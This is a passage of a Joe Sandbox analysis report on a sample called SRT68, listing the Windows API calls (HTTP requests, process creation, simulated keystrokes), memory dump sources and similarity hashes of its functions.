• Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
Similarity
• API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
• String ID:
• API String ID: 2395222682-0
• Opcode ID: ef06001ef5396d0d357823a7eb23778556238196ecf9691c2b232ce88cf61783
• Instruction ID: dcad1cdb61a8e734f9c5dfef949c68b352b2a8870247f05aefe87752098f4e2a
• Opcode Fuzzy Hash: ef06001ef5396d0d357823a7eb23778556238196ecf9691c2b232ce88cf61783
• Instruction Fuzzy Hash: 56C136B1208305AFD700DF68C88492BBBE9FF89748F04895DF9899B251DB75EE05CB52
APIs
• SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 01007A6C
Memory Dump Source
• Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
Similarity
• API ID: ArraySafeVartype
• String ID:
• API String ID: 1725837607-0
• Opcode ID: e4db5ab3a0aa3771b6fb1afa8e43a0de415ec2a72728c48c124cc90fe0dc0103
• Instruction ID: d9e0c736ed0faa9c38062661b151cba33affd7a40e7c8ce02a6eafad0a748775
• Opcode Fuzzy Hash: e4db5ab3a0aa3771b6fb1afa8e43a0de415ec2a72728c48c124cc90fe0dc0103
• Instruction Fuzzy Hash: 67B1627190020A9FEB12DF98C885BBEBBF4FF49321F144469E6C1E7281D779A941CB91
APIs
• GetCurrentThreadId.KERNEL32 ref: 010011F0
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,01000268,?,00000001), ref: 01001204
• GetWindowThreadProcessId.USER32(00000000), ref: 0100120B
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,01000268,?,00000001), ref: 0100121A
• GetWindowThreadProcessId.USER32(?,00000000), ref: 0100122C
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,01000268,?,00000001), ref: 01001245
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,01000268,?,00000001), ref: 01001257
• AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,01000268,?,00000001), ref: 0100129C
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,01000268,?,00000001), ref: 010012B1
• AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,01000268,?,00000001), ref: 010012BC
Memory Dump Source
• Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
• API String ID: 2156557900-0
• Opcode ID: 729925676977cb3b924275ae2acb7f858333a88b0050a5d115c6c7c2b636064d
• Instruction ID: 7cfe4f23110d39a0eb38d3baf1abb0c7747d4fe531bf5aa4d56806c6d1d956bd
• Opcode Fuzzy Hash: 729925676977cb3b924275ae2acb7f858333a88b0050a5d115c6c7c2b636064d
• Instruction Fuzzy Hash: DB31CEB5600204BBFB329F68D988FA93BFDEB58351F214155F980C61DAD77AD9408B60
APIs
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00FAFAA6
• OleUninitialize.OLE32(?,00000000), ref: 00FAFB45
• UnregisterHotKey.USER32(?), ref: 00FAFC9C
• DestroyWindow.USER32(?), ref: 00FE45D6
• FreeLibrary.KERNEL32(?), ref: 00FE463B
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 00FE4668
Memory Dump Source
• Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
Similarity
• API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
• String ID: close all
• API String ID: 469580280-3243417748
• Opcode ID: b52c6a7b1a85bfe707faf5e14f05b3ba59ef3ab0e013f581b40f22367e981493
• Instruction ID: ddcf3b1f50a67b3f0fac59644f2890aadbef0ec4b3f37e1fbc2bff158c06c182
• Opcode Fuzzy Hash: b52c6a7b1a85bfe707faf5e14f05b3ba59ef3ab0e013f581b40f22367e981493
• Instruction Fuzzy Hash: C5A18F71701212CFCB29EF55C994B69F364BF06760F5442ADE80AAB261CB34ED16EF50
APIs
• EnumChildWindows.USER32(?,00FFA439), ref: 00FFA377
Memory Dump Source
• Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
Similarity
• API ID: ChildEnumWindows
• String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
• API String ID: 3555792229-1603158881
• Opcode ID: b7c9c217c3dda5faff46c68c494e5a61a168839270986da940a00ce0fbaf1cdd
• Instruction ID: ca9141afbb1ac5e68058d1e1bb2830ca266b0740c8a95c3b3e20d23e96058db5
• Opcode Fuzzy Hash: b7c9c217c3dda5faff46c68c494e5a61a168839270986da940a00ce0fbaf1cdd
• Instruction Fuzzy Hash: 1291B7B1A0060ADACB08EF60C842BFEFB74BF04350F548119D95DA7261DF356959FBA1
APIs
• SetWindowLongW.USER32(?,000000EB), ref: 00FA2EAE
  • Part of subcall function 00FA1DB3: GetClientRect.USER32(?,?), ref: 00FA1DDC
  • Part of subcall function 00FA1DB3: GetWindowRect.USER32(?,?), ref: 00FA1E1D
  • Part of subcall function 00FA1DB3: ScreenToClient.USER32(?,?), ref: 00FA1E45
• GetDC.USER32 ref: 00FDCD32
• SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00FDCD45
• SelectObject.GDI32(00000000,00000000), ref: 00FDCD53
• SelectObject.GDI32(00000000,00000000), ref: 00FDCD68
• ReleaseDC.USER32(?,00000000), ref: 00FDCD70
• MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00FDCDFB
Memory Dump Source
• Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
Similarity
• API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
• String ID: U
• API String ID: 4009187628-3372436214
• Opcode ID: f7be95dfd9aaaa281b362280279fb46ccdf6395633d3228249c83b6e1c364bc0
• Instruction ID: 2a0467de679854fee67b6ee4bc812221f5df14b0dbe190016389e5346b60ffe2
• Opcode Fuzzy Hash: f7be95dfd9aaaa281b362280279fb46ccdf6395633d3228249c83b6e1c364bc0
• Instruction Fuzzy Hash: 9571A471900206DFCF319F64CC84AAA7BB7FF49360F18426BED955A255C7359C81EB90
                                                                      APIs
                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 01011A50
                                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 01011A7C
                                                                      • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 01011ABE
                                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 01011AD3
                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 01011AE0
                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 01011B10
                                                                      • InternetCloseHandle.WININET(00000000), ref: 01011B57
                                                                        • Part of subcall function 01012483: GetLastError.KERNEL32(?,?,01011817,00000000,00000000,00000001), ref: 01012498
                                                                        • Part of subcall function 01012483: SetEvent.KERNEL32(?,?,01011817,00000000,00000000,00000001), ref: 010124AD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                      • String ID:
                                                                      • API String ID: 2603140658-3916222277
                                                                      • Opcode ID: f50984c9dd977c69267c126fdd6726e9863df8282e02902aef12bcd558b5db24
                                                                      • Instruction ID: 55d240b1ef48634011a2a71b536a80d20b0c882d7d18e5df5d99e9ea534ccb3e
                                                                      • Opcode Fuzzy Hash: f50984c9dd977c69267c126fdd6726e9863df8282e02902aef12bcd558b5db24
                                                                      • Instruction Fuzzy Hash: C641A3B1500209BFEB168F64CC89FFF7BACFF08354F104156FA859A149E7799A408BA0
                                                                      APIs
                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0102F910), ref: 01018D28
                                                                      • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0102F910), ref: 01018D5C
                                                                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 01018ED6
                                                                      • SysFreeString.OLEAUT32(?), ref: 01018F00
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                      • String ID:
                                                                      • API String ID: 560350794-0
                                                                      • Opcode ID: 35c18b5f9f82acf6b00fca9ac95b05ac9b7608db650ebc2c9ae700b65e939587
                                                                      • Instruction ID: 951e26c988f57dcba0c5b82ce2c07a59ea470626dbf83ab8655fad7348dd33b5
                                                                      • Opcode Fuzzy Hash: 35c18b5f9f82acf6b00fca9ac95b05ac9b7608db650ebc2c9ae700b65e939587
                                                                      • Instruction Fuzzy Hash: 7FF18A71A00209EFDF14DF98C884EAEBBB9FF49314F108099FA45AB255DB75AE41CB50
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 0101F6B5
                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0101F848
                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0101F86C
                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0101F8AC
                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0101F8CE
                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0101FA4A
                                                                      • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0101FA7C
                                                                      • CloseHandle.KERNEL32(?), ref: 0101FAAB
                                                                      • CloseHandle.KERNEL32(?), ref: 0101FB22
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                      • String ID:
                                                                      • API String ID: 4090791747-0
                                                                      • Opcode ID: 398cf227decf463f5ec96c40a0b8a4471c35f4eb875e984d4a4ce2f7e1ca514a
                                                                      • Instruction ID: 686f18b159859a860dba05d8dd8fc2f1f06df0ad8caae30a9a07b3245834ae2a
                                                                      • Opcode Fuzzy Hash: 398cf227decf463f5ec96c40a0b8a4471c35f4eb875e984d4a4ce2f7e1ca514a
                                                                      • Instruction Fuzzy Hash: 89E1CF712043029FD714EF28C881B6ABBE1BF85354F18856DF8C58B2A6CB39EC45DB52
                                                                      APIs
                                                                        • Part of subcall function 0100466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,01003697,?), ref: 0100468B
                                                                        • Part of subcall function 0100466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,01003697,?), ref: 010046A4
                                                                        • Part of subcall function 01004A31: GetFileAttributesW.KERNEL32(?,0100370B), ref: 01004A32
                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 01004D40
                                                                      • _wcscmp.LIBCMT ref: 01004D5A
                                                                      • MoveFileW.KERNEL32(?,?), ref: 01004D75
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 793581249-0
                                                                      • Opcode ID: e55f6ffad56e36fcf7db09c5353d7386da62d7f562d5286a0e244791592e0dcf
                                                                      • Instruction ID: ae10e55bccebd5a789f22f8fa80e5170580d37b7132517fb60b3389eabc2f59f
                                                                      • Opcode Fuzzy Hash: e55f6ffad56e36fcf7db09c5353d7386da62d7f562d5286a0e244791592e0dcf
                                                                      • Instruction Fuzzy Hash: EE5151B20083459BD765EBA4DC81DDF77ECAF85350F00092EA2C5D3191EE75A288C76A
                                                                      APIs
                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 010286FF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: InvalidateRect
                                                                      • String ID:
                                                                      • API String ID: 634782764-0
                                                                      • Opcode ID: 5503a2379b09a0810014d19774534e420cfd0694775474bc42c5a6cd5405f0ba
                                                                      • Instruction ID: df39795b0103bf5f8ea810f1874bfab92f9312c9df67d6be4f3165214336bc30
                                                                      • Opcode Fuzzy Hash: 5503a2379b09a0810014d19774534e420cfd0694775474bc42c5a6cd5405f0ba
                                                                      • Instruction Fuzzy Hash: 6251B538600265BEEB709E28DC89FAD3BE4FB09750F208157FAD0E61A1D77AE550CB50
                                                                      APIs
                                                                      • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00FDC2F7
                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00FDC319
                                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00FDC331
                                                                      • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00FDC34F
                                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00FDC370
                                                                      • DestroyIcon.USER32(00000000), ref: 00FDC37F
                                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00FDC39C
                                                                      • DestroyIcon.USER32(?), ref: 00FDC3AB
                                                                        • Part of subcall function 0102A4AF: DeleteObject.GDI32(00000000), ref: 0102A4E8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                      • String ID:
                                                                      • API String ID: 2819616528-0
                                                                      • Opcode ID: b5aa75f527e539386d78eb92ef5d903ad6e2c2b7348cb8122b41fedad4edb77c
                                                                      • Instruction ID: a561a58bd1af71229d540d1875066c35c682b30b2eb3d2713661b0c83f0587f3
                                                                      • Opcode Fuzzy Hash: b5aa75f527e539386d78eb92ef5d903ad6e2c2b7348cb8122b41fedad4edb77c
                                                                      • Instruction Fuzzy Hash: 76518CB1A00206AFDB24DF28CC45FAA37B5FB59360F104529F942D7290DB75ED50EBA0
                                                                      APIs
                                                                        • Part of subcall function 00FFA82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00FFA84C
                                                                        • Part of subcall function 00FFA82C: GetCurrentThreadId.KERNEL32 ref: 00FFA853
                                                                        • Part of subcall function 00FFA82C: AttachThreadInput.USER32(00000000,?,00FF9683,?,00000001), ref: 00FFA85A
                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00FF968E
                                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00FF96AB
                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00FF96AE
                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00FF96B7
                                                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00FF96D5
                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00FF96D8
                                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00FF96E1
                                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00FF96F8
                                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00FF96FB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                      • String ID:
                                                                      • API String ID: 2014098862-0
                                                                      • Opcode ID: 03dd5c3b570503773eb0c6edd82ad8833451038d5b294ea7c1ada9da20856aaa
                                                                      • Instruction ID: 101b5bb63a9ba96aa2be30730202df7b53e38d4dade395f355ffb105ea822cc1
                                                                      • Opcode Fuzzy Hash: 03dd5c3b570503773eb0c6edd82ad8833451038d5b294ea7c1ada9da20856aaa
                                                                      • Instruction Fuzzy Hash: B711ACB1910219BAF6306F70DC89F6A7A2DEB4C791F600415F384AB0A4CAF75C10DBA4
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00FF853C,00000B00,?,?), ref: 00FF892A
                                                                      • HeapAlloc.KERNEL32(00000000,?,00FF853C,00000B00,?,?), ref: 00FF8931
                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00FF853C,00000B00,?,?), ref: 00FF8946
                                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00FF853C,00000B00,?,?), ref: 00FF894E
                                                                      • DuplicateHandle.KERNEL32(00000000,?,00FF853C,00000B00,?,?), ref: 00FF8951
                                                                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00FF853C,00000B00,?,?), ref: 00FF8961
                                                                      • GetCurrentProcess.KERNEL32(00FF853C,00000000,?,00FF853C,00000B00,?,?), ref: 00FF8969
                                                                      • DuplicateHandle.KERNEL32(00000000,?,00FF853C,00000B00,?,?), ref: 00FF896C
                                                                      • CreateThread.KERNEL32(00000000,00000000,00FF8992,00000000,00000000,00000000), ref: 00FF8986
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                      • String ID:
                                                                      • API String ID: 1957940570-0
                                                                      • Opcode ID: 17012222bbaa939442b63e1b72a861c3a3d567e4f7ac78a5f1e55747ad00da16
                                                                      • Instruction ID: fc3f335b94a4e315ca1486092fb20efae0123098045d89b12021fe6059f60fe6
                                                                      • Opcode Fuzzy Hash: 17012222bbaa939442b63e1b72a861c3a3d567e4f7ac78a5f1e55747ad00da16
                                                                      • Instruction Fuzzy Hash: 4201FF75240308BFE730AFA5DC4EF677B6CEB89750F604410FA04DB195CA759800CB20
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                                      • API String ID: 0-572801152
                                                                      • Opcode ID: ad75fb491080a8416482130d866be654a0cedd4be75d2316a2a6a9650235aad4
                                                                      • Instruction ID: 5fcf705b513fa660d4bca170e587f60dde1efb2e3c4dff9d37c5f4c5519ade15
                                                                      • Opcode Fuzzy Hash: ad75fb491080a8416482130d866be654a0cedd4be75d2316a2a6a9650235aad4
                                                                      • Instruction Fuzzy Hash: F2C1D571A0020A9FDF10DF98C894BEEB7F5FF48318F148469EA85AB285E775AD40CB50
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearInit$_memset
                                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                      • API String ID: 2862541840-625585964
                                                                      • Opcode ID: da0eeb744b6c5ccbf5b07686ad46190225736f0a9dbb0ba949518ee750a2ac7c
                                                                      • Instruction ID: 8f055e3e459a5479f1aaad294c08904720d1224bab1f7ece3549a86194cc5202
